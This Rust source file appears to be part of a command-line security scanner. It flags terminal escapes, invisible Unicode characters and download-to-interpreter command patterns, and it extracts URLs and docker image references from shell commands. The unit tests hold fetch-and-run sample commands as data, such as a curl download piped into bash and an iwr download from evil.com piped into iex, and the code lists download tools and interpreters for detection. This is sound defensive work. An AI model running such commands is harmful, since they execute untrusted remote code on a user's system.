1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10 Exec,
12 Paste,
14 FileScan,
17}
18
19#[allow(dead_code)]
21mod tier1_generated {
22 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
23}
24
25pub fn extractor_ids() -> &'static [&'static str] {
27 tier1_generated::EXTRACTOR_IDS
28}
29
30static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
32 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
33});
34
35static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
37 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
38});
39
40static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
42 Regex::new(
43 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
44 )
45 .expect("url regex must compile")
46});
47
48pub struct ByteScanResult {
50 pub has_ansi_escapes: bool,
51 pub has_control_chars: bool,
52 pub has_bidi_controls: bool,
53 pub has_zero_width: bool,
54 pub has_invalid_utf8: bool,
55 pub has_unicode_tags: bool,
56 pub has_variation_selectors: bool,
57 pub has_invisible_math_operators: bool,
58 pub has_invisible_whitespace: bool,
59 pub details: Vec<ByteFinding>,
60}
61
62pub struct ByteFinding {
63 pub offset: usize,
64 pub byte: u8,
65 pub codepoint: Option<u32>,
67 pub description: String,
68}
69
70pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
72 match context {
73 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
74 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
75 ScanContext::FileScan => true,
77 }
78}
79
80pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
82 let mut result = ByteScanResult {
83 has_ansi_escapes: false,
84 has_control_chars: false,
85 has_bidi_controls: false,
86 has_zero_width: false,
87 has_invalid_utf8: false,
88 has_unicode_tags: false,
89 has_variation_selectors: false,
90 has_invisible_math_operators: false,
91 has_invisible_whitespace: false,
92 details: Vec::new(),
93 };
94
95 if std::str::from_utf8(input).is_err() {
97 result.has_invalid_utf8 = true;
98 }
99
100 let len = input.len();
101 let mut i = 0;
102 while i < len {
103 let b = input[i];
104
105 if b == 0x1b {
107 if i + 1 < len {
108 let next = input[i + 1];
109 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
110 result.has_ansi_escapes = true;
111 result.details.push(ByteFinding {
112 offset: i,
113 byte: b,
114 codepoint: None,
115 description: match next {
116 b'[' => "CSI escape sequence",
117 b']' => "OSC escape sequence",
118 b'_' => "APC escape sequence",
119 b'P' => "DCS escape sequence",
120 _ => "escape sequence",
121 }
122 .to_string(),
123 });
124 i += 2;
125 continue;
126 }
127 } else {
128 result.has_ansi_escapes = true;
130 result.details.push(ByteFinding {
131 offset: i,
132 byte: b,
133 codepoint: None,
134 description: "trailing escape byte".to_string(),
135 });
136 }
137 }
138
139 if b == b'\r' {
143 let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
144 if is_attack_cr {
145 result.has_control_chars = true;
146 result.details.push(ByteFinding {
147 offset: i,
148 byte: b,
149 codepoint: None,
150 description: format!("control character 0x{b:02x}"),
151 });
152 }
153 } else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
154 result.has_control_chars = true;
155 result.details.push(ByteFinding {
156 offset: i,
157 byte: b,
158 codepoint: None,
159 description: format!("control character 0x{b:02x}"),
160 });
161 }
162
163 if b == 0x7F {
165 result.has_control_chars = true;
166 result.details.push(ByteFinding {
167 offset: i,
168 byte: b,
169 codepoint: None,
170 description: "control character 0x7f (DEL)".to_string(),
171 });
172 }
173
174 if b >= 0xc0 {
176 let remaining = &input[i..];
178 if let Some(ch) = std::str::from_utf8(remaining)
179 .ok()
180 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
181 .and_then(|s| s.chars().next())
182 {
183 if is_bidi_control(ch) {
185 result.has_bidi_controls = true;
186 result.details.push(ByteFinding {
187 offset: i,
188 byte: b,
189 codepoint: Some(ch as u32),
190 description: format!("bidi control U+{:04X}", ch as u32),
191 });
192 }
193 if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
196 result.has_zero_width = true;
197 result.details.push(ByteFinding {
198 offset: i,
199 byte: b,
200 codepoint: Some(ch as u32),
201 description: format!("zero-width character U+{:04X}", ch as u32),
202 });
203 }
204 if is_unicode_tag(ch) {
206 result.has_unicode_tags = true;
207 result.details.push(ByteFinding {
208 offset: i,
209 byte: b,
210 codepoint: Some(ch as u32),
211 description: format!("unicode tag U+{:04X}", ch as u32),
212 });
213 }
214 if is_variation_selector(ch) {
216 result.has_variation_selectors = true;
217 result.details.push(ByteFinding {
218 offset: i,
219 byte: b,
220 codepoint: Some(ch as u32),
221 description: format!("variation selector U+{:04X}", ch as u32),
222 });
223 }
224 if is_invisible_math_operator(ch) {
226 result.has_invisible_math_operators = true;
227 result.details.push(ByteFinding {
228 offset: i,
229 byte: b,
230 codepoint: Some(ch as u32),
231 description: format!("invisible math operator U+{:04X}", ch as u32),
232 });
233 }
234 if is_invisible_whitespace(ch) {
236 result.has_invisible_whitespace = true;
237 result.details.push(ByteFinding {
238 offset: i,
239 byte: b,
240 codepoint: Some(ch as u32),
241 description: format!("invisible whitespace U+{:04X}", ch as u32),
242 });
243 }
244 i += ch.len_utf8();
245 continue;
246 }
247 }
248
249 i += 1;
250 }
251
252 result
253}
254
255fn is_bidi_control(ch: char) -> bool {
257 matches!(
258 ch,
259 '\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
271}
272
273fn is_zero_width(ch: char) -> bool {
275 matches!(
276 ch,
277 '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' | '\u{034F}' | '\u{00AD}' | '\u{2060}' )
285}
286
287fn is_unicode_tag(ch: char) -> bool {
289 ('\u{E0000}'..='\u{E007F}').contains(&ch)
290}
291
292fn is_variation_selector(ch: char) -> bool {
294 ('\u{FE00}'..='\u{FE0F}').contains(&ch)
296 || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
298}
299
300fn is_invisible_math_operator(ch: char) -> bool {
302 ('\u{2061}'..='\u{2064}').contains(&ch)
304}
305
306fn is_invisible_whitespace(ch: char) -> bool {
308 matches!(
309 ch,
310 '\u{200A}' | '\u{2009}' | '\u{202F}' )
314}
315
316pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
319 let segments = tokenize::tokenize(input, shell);
320 let mut results = Vec::new();
321
322 for (seg_idx, segment) in segments.iter().enumerate() {
323 let sink_context = is_sink_context(segment, &segments);
324 let resolved = resolve_segment_command(segment);
325
326 let mut url_sources: Vec<&str> = Vec::new();
330 if let Some(ref cmd) = segment.command {
331 url_sources.push(cmd.as_str());
332 }
333 for arg in &segment.args {
334 url_sources.push(arg.as_str());
335 }
336 for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
337 if ignores_env_assignment_url(&name) {
338 continue;
339 }
340 let clean = strip_quotes(&value);
341 if !clean.is_empty() {
342 push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
343 }
344 }
345 for source in &url_sources {
346 push_urls_from_source(source, seg_idx, sink_context, &mut results);
347 }
348
349 let is_docker_cmd = resolved
352 .as_ref()
353 .is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
354 if sink_context && !is_docker_cmd {
355 if let Some(cmd) = resolved.as_ref() {
356 for (arg_idx, arg) in cmd.args.iter().enumerate() {
357 if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
359 continue;
360 }
361 let clean = strip_quotes(arg);
362 if is_remote_copy_target(&cmd.name, &clean) {
363 continue;
364 }
365 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
366 results.push(ExtractedUrl {
367 raw: clean.clone(),
368 parsed: UrlLike::SchemelessHostPath {
369 host: extract_host_from_schemeless(&clean),
370 path: extract_path_from_schemeless(&clean),
371 },
372 segment_index: seg_idx,
373 in_sink_context: true,
374 });
375 }
376 }
377 }
378 }
379
380 if let Some(cmd) = resolved.as_ref() {
382 if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
383 if let Some(docker_subcmd) = cmd.args.first() {
384 let subcmd_lower = docker_subcmd.to_lowercase();
385 if subcmd_lower == "build" {
386 let mut i = 1;
388 while i < cmd.args.len() {
389 let arg = strip_quotes(&cmd.args[i]);
390 if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
391 let tag_val = strip_quotes(&cmd.args[i + 1]);
392 if !tag_val.is_empty() {
393 let docker_url = parse::parse_docker_ref(&tag_val);
394 results.push(ExtractedUrl {
395 raw: tag_val,
396 parsed: docker_url,
397 segment_index: seg_idx,
398 in_sink_context: true,
399 });
400 }
401 i += 2;
402 } else if arg.starts_with("-t") && arg.len() > 2 {
403 let tag_val = strip_quotes(&arg[2..]);
404 let docker_url = parse::parse_docker_ref(&tag_val);
405 results.push(ExtractedUrl {
406 raw: tag_val,
407 parsed: docker_url,
408 segment_index: seg_idx,
409 in_sink_context: true,
410 });
411 i += 1;
412 } else if let Some(val) = arg.strip_prefix("--tag=") {
413 let tag_val = strip_quotes(val);
414 let docker_url = parse::parse_docker_ref(&tag_val);
415 results.push(ExtractedUrl {
416 raw: tag_val,
417 parsed: docker_url,
418 segment_index: seg_idx,
419 in_sink_context: true,
420 });
421 i += 1;
422 } else {
423 i += 1;
424 }
425 }
426 } else if subcmd_lower == "image" {
427 if let Some(image_subcmd) = cmd.args.get(1) {
429 let image_subcmd_lower = image_subcmd.to_lowercase();
430 if matches!(
431 image_subcmd_lower.as_str(),
432 "pull" | "push" | "inspect" | "rm" | "tag"
433 ) {
434 extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
435 }
436 }
437 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
438 extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
440 }
441 }
442 }
443 }
444 }
445
446 results
447}
448
449#[derive(Debug, Clone)]
451pub struct ExtractedUrl {
452 pub raw: String,
453 pub parsed: UrlLike,
454 pub segment_index: usize,
455 pub in_sink_context: bool,
456}
457
458const DOCKER_VALUE_FLAGS: &[&str] = &[
460 "--platform",
461 "--format",
462 "--filter",
463 "-f",
464 "--label",
465 "-l",
466 "--name",
467 "--hostname",
468 "--user",
469 "-u",
470 "--workdir",
471 "-w",
472 "--network",
473 "--net",
474 "--env",
475 "-e",
476 "--env-file",
477 "--publish",
478 "-p",
479 "--expose",
480 "--volume",
481 "-v",
482 "--mount",
483 "--add-host",
484 "--device",
485 "--entrypoint",
486 "--log-driver",
487 "--log-opt",
488 "--restart",
489 "--runtime",
490 "--cpus",
491 "--cpu-shares",
492 "--cpu-quota",
493 "--memory",
494 "--memory-reservation",
495 "--memory-swap",
496 "--shm-size",
497 "--ulimit",
498 "--security-opt",
499 "--sysctl",
500 "--tmpfs",
501 "--gpus",
502 "--ipc",
503 "--pid",
504 "--userns",
505 "--cgroupns",
506];
507
508const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
510
511fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
513 let mut skip_next = false;
514 let mut end_of_options = false;
515 for arg in args {
516 if skip_next {
517 skip_next = false;
518 continue;
519 }
520 let clean = strip_quotes(arg);
521 if clean == "--" {
522 end_of_options = true;
523 continue;
524 }
525 if !end_of_options && clean.starts_with("--") && clean.contains('=') {
526 continue; }
528 if !end_of_options && clean.starts_with('-') {
529 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
530 skip_next = true;
531 }
532 if DOCKER_VALUE_PREFIXES
533 .iter()
534 .any(|p| clean.starts_with(p) && clean.len() > p.len())
535 {
536 continue;
537 }
538 continue;
539 }
540 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
541 let docker_url = parse::parse_docker_ref(&clean);
542 results.push(ExtractedUrl {
543 raw: clean,
544 parsed: docker_url,
545 segment_index: seg_idx,
546 in_sink_context: true,
547 });
548 }
549 break; }
551}
552
553#[derive(Debug, Clone)]
554struct ResolvedCommand<'a> {
555 name: String,
556 args: &'a [String],
557}
558
559fn push_urls_from_source(
560 source: &str,
561 segment_index: usize,
562 in_sink_context: bool,
563 results: &mut Vec<ExtractedUrl>,
564) {
565 for mat in URL_REGEX.find_iter(source) {
566 let raw = mat.as_str().to_string();
567 let url = parse::parse_url(&raw);
568 results.push(ExtractedUrl {
569 raw,
570 parsed: url,
571 segment_index,
572 in_sink_context,
573 });
574 }
575}
576
577fn ignores_env_assignment_url(name: &str) -> bool {
578 let upper = name.to_ascii_uppercase();
579 upper == "NO_PROXY" || upper.ends_with("_PROXY")
580}
581
582fn env_long_flag_takes_value(flag: &str) -> bool {
583 let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
584 matches!(name, "--unset" | "--chdir" | "--split-string")
585}
586
587fn command_base_name(raw: &str) -> String {
588 let clean = strip_quotes(raw);
589 clean
590 .rsplit(['/', '\\'])
591 .next()
592 .unwrap_or(clean.as_str())
593 .to_lowercase()
594}
595
596fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
597 let command = segment.command.as_ref()?;
598 resolve_named_command(command, &segment.args)
599}
600
601fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
602 let name = command_base_name(command);
603 match name.as_str() {
604 "env" => resolve_env_command(args),
605 "command" => resolve_command_wrapper(args),
606 "time" => resolve_time_wrapper(args),
607 "tirith" => resolve_tirith_command(args),
608 _ => Some(ResolvedCommand { name, args }),
609 }
610}
611
612fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
613 let mut i = 0;
614 while i < args.len() {
615 let clean = strip_quotes(&args[i]);
616 if clean == "--" {
617 i += 1;
618 break;
619 }
620 if tokenize::is_env_assignment(&clean) {
621 i += 1;
622 continue;
623 }
624 if clean.starts_with('-') {
625 if clean.starts_with("--") {
626 if env_long_flag_takes_value(&clean) && !clean.contains('=') {
627 i += 2;
628 } else {
629 i += 1;
630 }
631 continue;
632 }
633 if clean == "-u" || clean == "-C" || clean == "-S" {
634 i += 2;
635 continue;
636 }
637 i += 1;
638 continue;
639 }
640 return resolve_named_command(&clean, &args[i + 1..]);
641 }
642
643 while i < args.len() {
644 let clean = strip_quotes(&args[i]);
645 if tokenize::is_env_assignment(&clean) {
646 i += 1;
647 continue;
648 }
649 return resolve_named_command(&clean, &args[i + 1..]);
650 }
651
652 None
653}
654
655fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
656 let mut i = 0;
657 while i < args.len() {
658 let clean = strip_quotes(&args[i]);
659 if clean == "--" {
660 i += 1;
661 break;
662 }
663 if clean.starts_with('-') {
664 i += 1;
665 continue;
666 }
667 break;
668 }
669 args.get(i)
670 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
671}
672
673fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
674 let mut i = 0;
675 while i < args.len() {
676 let clean = strip_quotes(&args[i]);
677 if clean == "--" {
678 i += 1;
679 break;
680 }
681 if clean.starts_with('-') {
682 if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
683 i += 2;
684 } else {
685 i += 1;
686 }
687 continue;
688 }
689 break;
690 }
691 args.get(i)
692 .and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
693}
694
695fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
696 let subcommand = args.first().map(|arg| command_base_name(arg))?;
697 match subcommand.as_str() {
698 "run" => Some(ResolvedCommand {
699 name: "tirith-run".to_string(),
700 args: &args[1..],
701 }),
702 _ => Some(ResolvedCommand {
703 name: "tirith".to_string(),
704 args,
705 }),
706 }
707}
708
709fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
711 if let Some(cmd) = resolve_segment_command(segment) {
712 let cmd_lower = cmd.name;
713 if cmd_lower == "git" {
715 return is_git_sink(cmd.args);
716 }
717 if is_source_command(&cmd_lower) {
718 return true;
719 }
720 }
721
722 if let Some(sep) = &segment.preceding_separator {
724 if sep == "|" || sep == "|&" {
725 if let Some(cmd) = resolve_segment_command(segment) {
727 if is_interpreter(&cmd.name) {
728 return true;
729 }
730 }
731 }
732 }
733
734 false
735}
736
737fn is_source_command(cmd: &str) -> bool {
738 matches!(
739 cmd,
740 "curl"
741 | "wget"
742 | "http"
743 | "https"
744 | "xh"
745 | "fetch"
746 | "scp"
747 | "rsync"
748 | "docker"
749 | "podman"
750 | "nerdctl"
751 | "pip"
752 | "pip3"
753 | "npm"
754 | "npx"
755 | "yarn"
756 | "pnpm"
757 | "go"
758 | "cargo"
759 | "iwr"
760 | "irm"
761 | "invoke-webrequest"
762 | "invoke-restmethod"
763 | "tirith-run"
764 )
765}
766
767fn is_remote_copy_target(cmd: &str, arg: &str) -> bool {
768 if !matches!(cmd, "scp" | "rsync") {
769 return false;
770 }
771
772 if let Some(at_pos) = arg.find('@') {
773 let before_at = &arg[..at_pos];
774 let after_at = &arg[at_pos + 1..];
775 return !before_at.contains(':') && !after_at.contains('/') && !after_at.contains(':');
776 }
777
778 false
779}
780
781fn is_git_sink(args: &[String]) -> bool {
784 if args.is_empty() {
785 return false;
786 }
787 for arg in args {
789 let clean = strip_quotes(arg);
790 if clean.starts_with('-') {
791 continue;
792 }
793 return matches!(
794 clean.as_str(),
795 "clone" | "fetch" | "pull" | "submodule" | "remote"
796 );
797 }
798 false
799}
800
801fn is_interpreter(cmd: &str) -> bool {
802 matches!(
803 cmd,
804 "sh" | "bash"
805 | "zsh"
806 | "dash"
807 | "ksh"
808 | "python"
809 | "python3"
810 | "node"
811 | "perl"
812 | "ruby"
813 | "php"
814 | "iex"
815 | "invoke-expression"
816 )
817}
818
819fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
823 let cmd_lower = cmd.to_lowercase();
824 let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
825
826 match cmd_base {
827 "curl" => {
828 if arg_index > 0 {
829 let prev = strip_quotes(&args[arg_index - 1]);
830 if prev == "-o"
831 || prev == "--output"
832 || prev == "-u"
833 || prev == "--user"
834 || prev == "-U"
835 || prev == "--proxy-user"
836 {
837 return true;
838 }
839 }
840 let current = strip_quotes(&args[arg_index]);
841 if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
842 return true;
843 }
844 if current.starts_with("--output=")
845 || current.starts_with("--user=")
846 || current.starts_with("--proxy-user=")
847 {
848 return true;
849 }
850 false
851 }
852 "wget" => {
853 if arg_index > 0 {
854 let prev = strip_quotes(&args[arg_index - 1]);
855 if prev == "-O"
856 || prev == "--output-document"
857 || prev == "--user"
858 || prev == "--password"
859 || prev == "--http-user"
860 || prev == "--http-password"
861 || prev == "--ftp-user"
862 || prev == "--ftp-password"
863 || prev == "--proxy-user"
864 || prev == "--proxy-password"
865 {
866 return true;
867 }
868 }
869 let current = strip_quotes(&args[arg_index]);
870 if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
871 return true;
872 }
873 if current.starts_with("--output-document=")
874 || current.starts_with("--user=")
875 || current.starts_with("--password=")
876 || current.starts_with("--http-user=")
877 || current.starts_with("--http-password=")
878 || current.starts_with("--ftp-user=")
879 || current.starts_with("--ftp-password=")
880 || current.starts_with("--proxy-user=")
881 || current.starts_with("--proxy-password=")
882 {
883 return true;
884 }
885 false
886 }
887 "http" | "https" | "xh" => {
888 if arg_index > 0 {
889 let prev = strip_quotes(&args[arg_index - 1]);
890 if prev == "-a" || prev == "--auth" {
891 return true;
892 }
893 }
894 let current = strip_quotes(&args[arg_index]);
895 if current.starts_with("--auth=") {
896 return true;
897 }
898 false
899 }
900 _ => false,
901 }
902}
903
904fn strip_quotes(s: &str) -> String {
905 let s = s.trim();
906 if s.len() >= 2
907 && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
908 {
909 s[1..s.len() - 1].to_string()
910 } else {
911 s.to_string()
912 }
913}
914
915fn looks_like_schemeless_host(s: &str) -> bool {
916 if s.starts_with('-') || !s.contains('.') {
918 return false;
919 }
920 if s.starts_with('.') {
922 return false;
923 }
924 let host_part = s.split('/').next().unwrap_or(s);
926 if !host_part.contains('.') || host_part.contains(' ') {
927 return false;
928 }
929 let host_lower = host_part.to_lowercase();
935 let has_meaningful_path = s.find('/').is_some_and(|idx| {
936 let after_slash = &s[idx + 1..];
937 !after_slash.is_empty() && after_slash != "/"
938 });
939 if !has_meaningful_path {
940 let file_exts = [
941 ".sh",
942 ".py",
943 ".rb",
944 ".js",
945 ".ts",
946 ".go",
947 ".rs",
948 ".c",
949 ".h",
950 ".txt",
951 ".md",
952 ".json",
953 ".yaml",
954 ".yml",
955 ".xml",
956 ".html",
957 ".css",
958 ".tar.gz",
959 ".tar.bz2",
960 ".tar.xz",
961 ".tgz",
962 ".zip",
963 ".gz",
964 ".bz2",
965 ".rpm",
966 ".deb",
967 ".pkg",
968 ".dmg",
969 ".exe",
970 ".msi",
971 ".dll",
972 ".so",
973 ".log",
974 ".conf",
975 ".cfg",
976 ".ini",
977 ".toml",
978 ".png",
979 ".jpg",
980 ".jpeg",
981 ".gif",
982 ".bmp",
983 ".ico",
984 ".tiff",
985 ".tif",
986 ".pdf",
987 ".csv",
988 ".mp3",
989 ".mp4",
990 ".wav",
991 ".avi",
992 ".mkv",
993 ".flac",
994 ".ogg",
995 ".webm",
996 ".ttf",
997 ".otf",
998 ".woff",
999 ".woff2",
1000 ".docx",
1001 ".xlsx",
1002 ".pptx",
1003 ".sqlite",
1004 ".lock",
1005 ".example",
1006 ".local",
1007 ".bak",
1008 ".tmp",
1009 ".swp",
1010 ".orig",
1011 ".patch",
1012 ".diff",
1013 ".map",
1014 ".env",
1015 ".sample",
1016 ".dist",
1017 ".editorconfig",
1018 ];
1019 if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
1020 return false;
1021 }
1022 }
1023 let labels: Vec<&str> = host_part.split('.').collect();
1025 if labels.len() < 2 {
1026 return false;
1027 }
1028 let tld = labels.last().unwrap();
1030 tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
1031}
1032
1033fn extract_host_from_schemeless(s: &str) -> String {
1034 s.split('/').next().unwrap_or(s).to_string()
1035}
1036
1037fn extract_path_from_schemeless(s: &str) -> String {
1038 if let Some(idx) = s.find('/') {
1039 s[idx..].to_string()
1040 } else {
1041 String::new()
1042 }
1043}
1044
1045#[cfg(test)]
1046mod tests {
1047 use super::*;
1048
1049 #[test]
1050 fn test_tier1_exec_matches_url() {
1051 assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
1052 }
1053
1054 #[test]
1055 fn test_tier1_exec_no_match_simple() {
1056 assert!(!tier1_scan("ls -la", ScanContext::Exec));
1057 }
1058
1059 #[test]
1060 fn test_tier1_exec_no_match_echo() {
1061 assert!(!tier1_scan("echo hello world", ScanContext::Exec));
1062 }
1063
1064 #[test]
1065 fn test_tier1_exec_matches_pipe_bash() {
1066 assert!(tier1_scan("something | bash", ScanContext::Exec));
1067 }
1068
1069 #[test]
1070 fn test_tier1_exec_matches_pipe_sudo_bash() {
1071 assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
1072 }
1073
1074 #[test]
1075 fn test_tier1_exec_matches_pipe_env_bash() {
1076 assert!(tier1_scan("something | env bash", ScanContext::Exec));
1077 }
1078
1079 #[test]
1080 fn test_tier1_exec_matches_pipe_bin_bash() {
1081 assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
1082 }
1083
1084 #[test]
1085 fn test_tier1_exec_matches_git_scp() {
1086 assert!(tier1_scan(
1087 "git clone git@github.com:user/repo",
1088 ScanContext::Exec
1089 ));
1090 }
1091
1092 #[test]
1093 fn test_tier1_exec_matches_punycode() {
1094 assert!(tier1_scan(
1095 "curl https://xn--example-cua.com",
1096 ScanContext::Exec
1097 ));
1098 }
1099
1100 #[test]
1101 fn test_tier1_exec_matches_docker() {
1102 assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
1103 }
1104
1105 #[test]
1106 fn test_tier1_exec_matches_iwr() {
1107 assert!(tier1_scan(
1108 "iwr https://evil.com/script.ps1",
1109 ScanContext::Exec
1110 ));
1111 }
1112
1113 #[test]
1114 fn test_tier1_exec_matches_curl() {
1115 assert!(tier1_scan(
1116 "curl https://example.com/install.sh",
1117 ScanContext::Exec
1118 ));
1119 }
1120
1121 #[test]
1122 fn test_tier1_exec_matches_lookalike_tld() {
1123 assert!(tier1_scan("open file.zip", ScanContext::Exec));
1124 }
1125
1126 #[test]
1127 fn test_tier1_exec_matches_shortener() {
1128 assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
1129 }
1130
1131 #[test]
1132 fn test_tier1_paste_matches_non_ascii() {
1133 assert!(tier1_scan("café", ScanContext::Paste));
1134 }
1135
1136 #[test]
1137 fn test_tier1_paste_exec_patterns_also_match() {
1138 assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
1139 }
1140
1141 #[test]
1142 fn test_tier1_exec_no_non_ascii() {
1143 assert!(!tier1_scan("echo café", ScanContext::Exec));
1145 }
1146
1147 #[test]
1148 fn test_byte_scan_ansi() {
1149 let input = b"hello \x1b[31mred\x1b[0m world";
1150 let result = scan_bytes(input);
1151 assert!(result.has_ansi_escapes);
1152 }
1153
1154 #[test]
1155 fn test_byte_scan_control_chars() {
1156 let input = b"hello\rworld";
1157 let result = scan_bytes(input);
1158 assert!(result.has_control_chars);
1159 }
1160
1161 #[test]
1162 fn test_byte_scan_bidi() {
1163 let input = "hello\u{202E}dlrow".as_bytes();
1164 let result = scan_bytes(input);
1165 assert!(result.has_bidi_controls);
1166 }
1167
1168 #[test]
1169 fn test_byte_scan_zero_width() {
1170 let input = "hel\u{200B}lo".as_bytes();
1171 let result = scan_bytes(input);
1172 assert!(result.has_zero_width);
1173 }
1174
1175 #[test]
1176 fn test_byte_scan_clean() {
1177 let input = b"hello world\n";
1178 let result = scan_bytes(input);
1179 assert!(!result.has_ansi_escapes);
1180 assert!(!result.has_control_chars);
1181 assert!(!result.has_bidi_controls);
1182 assert!(!result.has_zero_width);
1183 }
1184
1185 #[test]
1186 fn test_extract_urls_basic() {
1187 let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1188 assert_eq!(urls.len(), 1);
1189 assert_eq!(urls[0].raw, "https://example.com/install.sh");
1190 }
1191
1192 #[test]
1193 fn test_extract_urls_from_leading_env_assignment() {
1194 let urls = extract_urls(
1195 "PAYLOAD_URL=https://example.com/install.sh curl ok",
1196 ShellType::Posix,
1197 );
1198 assert!(
1199 urls.iter()
1200 .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
1201 "leading env assignment URL should be extracted in sink context"
1202 );
1203 }
1204
1205 #[test]
1206 fn test_extract_urls_from_quoted_leading_env_assignment() {
1207 let urls = extract_urls(
1208 "PAYLOAD_URL='https://example.com/install.sh' curl ok",
1209 ShellType::Posix,
1210 );
1211 assert!(
1212 urls.iter()
1213 .any(|u| u.raw == "https://example.com/install.sh"),
1214 "quoted leading env assignment URL should be extracted"
1215 );
1216 }
1217
1218 #[test]
1219 fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
1220 let urls = extract_urls(
1221 "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
1222 ShellType::Posix,
1223 );
1224 assert!(
1225 !urls.iter().any(|u| u.raw == "http://proxy:8080"),
1226 "proxy configuration URLs should not be treated as destinations"
1227 );
1228 }
1229
1230 #[test]
1231 fn test_extract_urls_pipe() {
1232 let urls = extract_urls(
1233 "curl https://example.com/install.sh | bash",
1234 ShellType::Posix,
1235 );
1236 assert!(!urls.is_empty());
1237 assert!(urls[0].in_sink_context);
1238 }
1239
1240 #[test]
1241 fn test_extract_urls_scp() {
1242 let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1243 assert!(!urls.is_empty());
1244 assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1245 }
1246
1247 #[test]
1248 fn test_extract_docker_ref() {
1249 let urls = extract_urls("docker pull nginx", ShellType::Posix);
1250 let docker_urls: Vec<_> = urls
1251 .iter()
1252 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1253 .collect();
1254 assert_eq!(docker_urls.len(), 1);
1255 }
1256
1257 #[test]
1258 fn test_extract_powershell_iwr() {
1259 let urls = extract_urls(
1260 "iwr https://example.com/script.ps1 | iex",
1261 ShellType::PowerShell,
1262 );
1263 assert!(!urls.is_empty());
1264 }
1265
1266 #[test]
1267 fn test_wrapper_preserves_sink_context() {
1268 let urls = extract_urls(
1269 "env --ignore-environment curl http://example.com",
1270 ShellType::Posix,
1271 );
1272 assert!(
1273 urls.iter()
1274 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1275 "wrapped sink commands should keep sink context"
1276 );
1277 }
1278
1279 #[test]
1280 fn test_env_wrapper_preserves_tirith_run_sink_context() {
1281 let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
1282 assert!(
1283 urls.iter()
1284 .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1285 "env wrapper should preserve tirith run sink context"
1286 );
1287 }
1288
